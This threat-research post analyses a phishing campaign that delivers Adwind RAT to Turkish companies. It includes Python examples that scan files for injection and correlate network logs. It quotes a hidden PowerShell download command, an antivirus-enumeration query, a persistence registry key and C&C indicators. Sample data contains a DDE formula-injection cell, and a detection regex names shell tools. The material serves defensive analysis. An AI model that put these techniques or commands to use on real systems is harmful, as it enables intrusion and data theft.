Research by: Yohann Sillam and Daniel Alima
Check Point researchers are following an evolving, ongoing malspam campaign that targets more than 80 Turkish companies. The malware uses several evasive methods to bypass security solutions.
The initial attack vector is a phishing email with an Office file attachment. The file is in a 20-year-old BIFF format that common Office parsing tools cannot parse. In the next stage, a malicious JAR file is downloaded. This file is heavily obfuscated and carries several evasion techniques to avoid detection by security products. The JAR then drops Adwind RAT, a multiplatform malware configured to steal sensitive information and send it to the attacker's Command and Control (C&C) server while giving the attacker remote access to the victim's machine.
All of these files have a very low detection rate on VirusTotal, most likely due to the heavy obfuscation.
Subject: Hello. Yearly life insurance documents
Body: Attached is the document that is forwarded by Mrs. Asena, the responsible…
Waiting for your response …
I wish you success in your work.
The initial malicious documents are either XLS or CSV files. The XLS files contain an External Reference record, designed to trigger the download of a malicious JAR file:
The command:

`cmd /c powershell -executionpolicy bypass -W Hidden -command`

aims at downloading a JAR file called zpmqwjs.docx.
EXTERNSHEET injection is a rare technique, which explains why only a small number of security vendors detected the file, as shown in Figure 3 below:
Moreover, the attackers added many junk and special characters to the cell content and used a 20-year-old BIFF version (BIFF5), so that analysis tools fail to parse the file. This is the error returned by the BiffView analysis tool:
The CSV file is used to download the same JAR via a formula injection technique.
Both vectors require user interaction to download the malicious JAR executable.
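To make the two attachment types concrete, here is an added triage example (written for this page, not Check Point's tooling or anything from the campaign's files). The first half walks the raw BIFF record stream of a legacy .xls workbook, decodes every EXTERNSHEET record and flags references that contain command tokens or the DDE `server|topic` separator; it tolerates junk bytes inside the string and a truncated tail, which is exactly what trips the higher-level parsers mentioned above. The second half scans CSV cells for formula injection while treating negative numbers as data. Assumptions: the BIFF5 EXTERNSHEET layout (one length byte, a type-tag character, then 8-bit characters) is my reading of the format; a real .xls is an OLE2 compound file, so the `Book` stream must be extracted first (for example with the `olefile` module) before being passed to these functions; both sample inputs are constructed and use a harmless `calc.exe` DDE cell rather than the campaign's PowerShell command.

```python
from __future__ import annotations

import csv
import io
import re
import struct

# ---- BIFF (legacy .xls) ---------------------------------------------------
# A BIFF stream is a sequence of <id:u16><len:u16><payload> records (little
# endian). Standard BIFF5 ids: BOF/EOF frame the stream, EXTERNSHEET carries
# the external reference that the campaign abuses.
BOF, EXTERNSHEET, EOF = 0x0809, 0x0017, 0x000A
# Tokens that do not belong in a legitimate external-workbook reference; the
# pipe is the DDE server|topic separator.
SUSPICIOUS_REF = re.compile(r"cmd|powershell|mshta|rundll32|\|", re.IGNORECASE)


def biff_record(rid: int, payload: bytes) -> bytes:
    """Build one raw BIFF record (used below only to construct the sample)."""
    return struct.pack("<HH", rid, len(payload)) + payload


def walk_biff(stream: bytes):
    """Yield (record_id, payload) per record; stop cleanly at a truncated tail."""
    off = 0
    while off + 4 <= len(stream):
        rid, ln = struct.unpack_from("<HH", stream, off)
        payload = stream[off + 4:off + 4 + ln]
        if len(payload) < ln:        # junk or truncated record: never read past the end
            break
        yield rid, payload
        off += 4 + ln


def externsheet_refs(stream: bytes) -> list[str]:
    """Decode every BIFF5 EXTERNSHEET name (assumed: length byte, then 8-bit chars).
    The first char is a type tag (0x01 = reference into another file); it and any
    other non-printable byte are stripped so inserted junk cannot hide a keyword."""
    refs = []
    for rid, payload in walk_biff(stream):
        if rid == EXTERNSHEET and payload:
            raw = payload[1:1 + payload[0]].decode("latin-1", "replace")
            refs.append(re.sub(r"[^\x20-\x7e]", "", raw))
    return refs


def suspicious_refs(stream: bytes) -> list[str]:
    return [r for r in externsheet_refs(stream) if SUSPICIOUS_REF.search(r)]


# ---- CSV formula injection ------------------------------------------------
FORMULA_TRIGGERS = "=+-@"
# DDE-style cell, [=]server|topic!item (generic shape, not the campaign's cell).
DDE_RE = re.compile(r"^[=+\-@]?\s*[A-Za-z]+\s*\|.*!")
RISKY_FUNCS = re.compile(r"\b(HYPERLINK|WEBSERVICE|IMPORTXML|IMPORTDATA)\s*\(", re.I)


def classify_cell(cell: str) -> str | None:
    """Label a cell 'dde', 'risky-function' or 'formula'; None if harmless."""
    s = cell.lstrip()
    if len(s) < 2:
        return None                  # empty, a single digit, or a lone '-' placeholder
    try:
        float(s.replace(",", ""))
        return None                  # "-12.50" is a number, not a formula
    except ValueError:
        pass
    if DDE_RE.match(s):
        return "dde"
    if RISKY_FUNCS.search(s):
        return "risky-function"
    if s[0] in FORMULA_TRIGGERS or cell[0] in "\t\r":   # leading tab/CR also trigger
        return "formula"
    return None


def scan_csv(text: str) -> list[tuple[int, int, str, str]]:
    """Return (row, col, label, cell) for each suspicious cell in CSV text."""
    return [(r, c, lbl, cell)
            for r, row in enumerate(csv.reader(io.StringIO(text)), 1)
            for c, cell in enumerate(row, 1)
            if (lbl := classify_cell(cell))]


# ---- Constructed samples (not files from the campaign) --------------------
SAMPLE_XLS = (biff_record(BOF, struct.pack("<HHHH", 0x0500, 0x0005, 0, 0))
              + biff_record(EXTERNSHEET, b"\x06\x02Sheet")          # benign in-book ref
              + biff_record(EXTERNSHEET, b"\x16\x01cm\x07d|'/c calc.exe'!A0")  # junk 0x07
              + biff_record(EOF, b"")
              + b"\x17\x00\xff\xff")                                # truncated junk tail
SAMPLE_CSV = ("name,balance,note\n"
              "Alice,-12.50,ok\n"
              "Bob,300,\"=cmd|'/c calc.exe'!A0\"\n"
              "Carol,7,\"=HYPERLINK(\"\"http://example.invalid\"\",\"\"x\"\")\"\n"
              "Dave,8,+SUM(1;2)\n")

if __name__ == "__main__":
    print("suspicious xls refs:", suspicious_refs(SAMPLE_XLS))
    for r, c, lbl, cell in scan_csv(SAMPLE_CSV):
        print(f"csv row {r} col {c}: {lbl:15} {cell!r}")
```

The record walker deliberately stops at the first record whose declared length runs past the end of the stream instead of raising, so a file padded with junk still yields every complete record before it. For CSV, the usual mitigation on the producing side is to prefix any cell that `classify_cell` flags with a single quote so spreadsheet applications treat it as text.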
GitHub Pages (pages.github.com) is a static site hosting service from GitHub that serves web documents directly from a GitHub repository. The attacker behind this campaign created a GitHub Pages site to distribute the malware samples hosted in their repositories.
One user associated with the GitHub repositories is named “5308682.” This account is associated with 18 different repositories. The current repository used for this campaign is “ofxamz19.”
Most of the files hosted by the attacker were variants of the same malicious JAR file under different filenames: “wucgy3jecwgpv.svg”, “6da7uj4b4oi2a.pdf”, “zpmqwjs.docx” and more.
Talos and Sophos reported earlier stages of the campaign. We noticed an evolution of this campaign, showing that the attackers are constantly improving their technique to maintain a low detection rate.
The dropper and payload files were obfuscated and detected by only a few security vendors. None of the decompilers we tried (JD-GUI, Fernflower, CFR, Procyon, ...) was able to decompile them entirely (see Figure 7 for an example).
Figure 9 shows the decompiled code of the dropper. Every function call is wrapped in a decryption function (Gv), and comparisons are performed between encrypted values.
Based on Figure 7, we concluded that the best way to analyze this JAR file was to debug it at the bytecode level. The arguments of all static functions (including the decryption function) called at runtime were encrypted, and so was their output. All interesting function calls went through dynamic invocation.
The relationship between the `Gv` function and the Java `findStatic` and `findDynamic` calls identified `Gv` as the main decryption function.
Compared to previous versions of the campaign, the malware performs several new evasion techniques to fool generic emulation sandboxes:
The malware then connects to checkip.amazonaws.com to obtain its public IP address and queries ipinfo.io/public_ip/country to check whether that IP is located in Turkey.
If any of these conditions is not met, the malware does not reveal its true behavior.
The payload then enumerates installed antivirus products via WMIC.exe and sends the result to the C&C server:

`WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`

The Windows utility attrib.exe is used to set the hidden attribute on the payload file.
The malware author chose an unremarkable icon and name (Uninstall) that would not raise suspicion. The file is associated with a Windows shell object, so double-clicking it opens the Control Panel (Figure 11) to mislead the victim; double-clicking does not start any malicious behavior. Launching the file with the Java runtime, however, starts the info stealing.
Older versions of the malware were associated with the Trash folder instead.
A value written under `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` ensures the malware persists across machine restarts.
After passing all the evasion checks described in the previous section, the malware tries to connect to 21736.xyz on TCP port 1505:
The picture above shows the dashboard of the standard Adwind 3.0 build. It gives the attacker the following capabilities:
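The geofencing lookups and the C&C connection described above form a short, distinctive network sequence, so here is an added detection example (written for this page, not a Check Point signature) that runs it over constructed proxy/firewall-style log lines. It rates a host "high" when both public-IP lookups are followed within a window by a connection to the C&C endpoint, and "medium" when only the C&C connection is seen. Assumptions: the log line format and the 10-minute window are mine; the indicators (checkip.amazonaws.com, ipinfo.io, 21736.xyz, TCP 1505) are the ones reported in the analysis above.

```python
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

# Indicators from the analysis above.
GEO_CHECK_HOSTS = {"checkip.amazonaws.com", "ipinfo.io"}   # public IP + country lookups
C2_HOST, C2_PORT = "21736.xyz", 1505                       # Adwind C&C, TCP
# Assumed: the lookups and the first C&C contact happen seconds apart.
WINDOW = timedelta(minutes=10)

# Constructed log format (not a real product's): ISO timestamp, src, dst, dport.
LOG_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")


def parse_line(line: str):
    """Return (timestamp, src, dst, dport) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"])


def detect(lines) -> list[tuple[str, str, str]]:
    """Return (src, severity, c2_timestamp) for every C&C connection.

    'high'   : both geolocation lookups seen from the same host within WINDOW
               before the C&C connection (the full geofence-then-beacon chain).
    'medium' : C&C connection without the preceding lookups (chain incomplete,
               lookups outside the window, or simply not logged).
    """
    lookups: dict[str, dict[str, datetime]] = defaultdict(dict)
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, dst, dport = rec
        if dst in GEO_CHECK_HOSTS:
            lookups[src].setdefault(dst, ts)      # keep the earliest lookup per host
        elif dst == C2_HOST and dport == C2_PORT:
            seen = lookups.get(src, {})
            chained = (GEO_CHECK_HOSTS.issubset(seen)
                       and ts - min(seen.values()) <= WINDOW)
            hits.append((src, "high" if chained else "medium", ts.isoformat()))
    return hits


# Constructed sample: one full chain, one host that only did a lookup, and one
# host whose lookups fall outside the window.
SAMPLE_LOG = """\
2019-06-12T10:01:03+00:00 src=10.0.0.5 dst=checkip.amazonaws.com dport=443
2019-06-12T10:01:04+00:00 src=10.0.0.5 dst=ipinfo.io dport=443
2019-06-12T10:01:09+00:00 src=10.0.0.5 dst=21736.xyz dport=1505
2019-06-12T10:03:00+00:00 src=10.0.0.9 dst=ipinfo.io dport=443
2019-06-12T10:03:30+00:00 src=10.0.0.9 dst=example.invalid dport=443
2019-06-12T11:30:00+00:00 src=10.0.0.7 dst=checkip.amazonaws.com dport=443
2019-06-12T11:30:01+00:00 src=10.0.0.7 dst=ipinfo.io dport=443
2019-06-12T12:15:00+00:00 src=10.0.0.7 dst=21736.xyz dport=1505
this line is not in the expected format and is skipped
"""

if __name__ == "__main__":
    for src, sev, when in detect(SAMPLE_LOG.splitlines()):
        print(f"{sev:6} {src:10} contacted {C2_HOST}:{C2_PORT} at {when}")
```

The two lookup services are legitimate and widely used, so on their own they are not worth alerting on; the value comes from correlating them per host with the outbound connection to the C&C port, which is why the example only emits a finding when the C&C contact is observed.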
As part of the Check Point SandBlast Zero-Day Protection solution, SandBlast Network prevents these attacks. This innovative zero-day threat sandboxing capability within the SandBlast solution delivers the best possible catch rate for these threats.
SandBlast Network Protections:
IPS protections:
We would like to thank our colleague, Itay Cohen for his precious contribution in this research.